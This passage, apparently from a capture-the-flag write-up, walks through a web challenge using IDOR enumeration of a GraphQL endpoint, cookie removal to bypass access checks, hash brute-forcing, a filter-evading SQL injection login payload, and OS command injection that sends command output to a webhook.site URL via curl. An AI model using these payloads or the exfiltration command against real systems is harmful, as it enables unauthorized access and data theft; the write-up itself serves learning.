the code above will spam the like button and after we execute the code we gained more than 15 likes!
we now have access to the beta page that seems to be a ticket to report to the staff in the website after playing around with the page i found out how the app was adding the tickets so i asked chat gpt
after reading the page above we can now try to make a request to gain more data and possibly get an IDOR
i had an idea after thinking about idors i usually read and study stuff i found on linked in and this page reminded me some page that is misconfigured can actually give you data if the page doesnt recognize you let me explain
import requestsurl ="https://1948-180-242-69-201.ngrok-free.app/graphql"headers ={'Content-Type':'application/json','Cookie':'your_session_cookie'}# Loop through different post IDs to test for IDORfor post_id inrange(1,11):# Change this range to test more posts query ={"query":f"{{ post(id: {post_id}) {{ id title content author {{ id username }} isPrivate }}}}"} response = requests.post(url,json=query,headers=headers)print(f"Response for id {post_id}: {response.json()}")
while usually you would give the app your cookies and stuff why dont you just delete them and try to request again if the server is misconfigured we could actually bypass that
and look what we found!
we actually got the hidden data and its saying something about a hidden directory called super_hiddenDirectories2
this is whats inside the hidden directories that seems to be a log file for the login page
after bruteforcing the hashes we only found 1 hash that works
we now have the staff tag how cool was that?
and now we can actually see the hidden tickets after gaining a higher privilege
there was 2 interesting tickets one gave a link and the other was speaking about an endpoint called 2020-login-page
opening the link we dont need to talk about this
this was the login page that were given when enumerating i noticed that
the page actually says admin login page thats when i know were getting very close to solving this!
I realised that every time i used “OR 1” or if i used “1=” or if i use “--” or if i use “/*” i will get an error saying sql injection detected so i tried modifying my sqli attack using 5=5 so i tried giving a blank “5=5” and the server didnt give any error i tried “or 5” too and it didnt give any errors so from this we know that the server is just sanitizing the “OR 1=1” sql
Asep-Admin'or '5'='5
this was the payload that i created cause of the filters that the server used
and we actually got the admin account!
i was stuck on this part for a bit of time until the kind author gave me a hint
when i give the query a parameter the server says it has a syntax error and when i use whoami it will say query executed thats when i know that this challenge is about OS command injection but i couldnt see the output of these commands i started grinding and studying about stuff
the kind author kindly gave me another hint about webhook thats where i understand it now (I UNDERSTAND IT NOW)
i was thinking about using curl to send the output of the command to a request catcher
url/ ?query=curl -X POST -d "data=$(whoami)" https://webhook.site/3e20d15b-ac6f-4e6f-afb4-b80b93f72c4a
this is the payload that i use
BINGO!
we actually captured the incoming request from the server
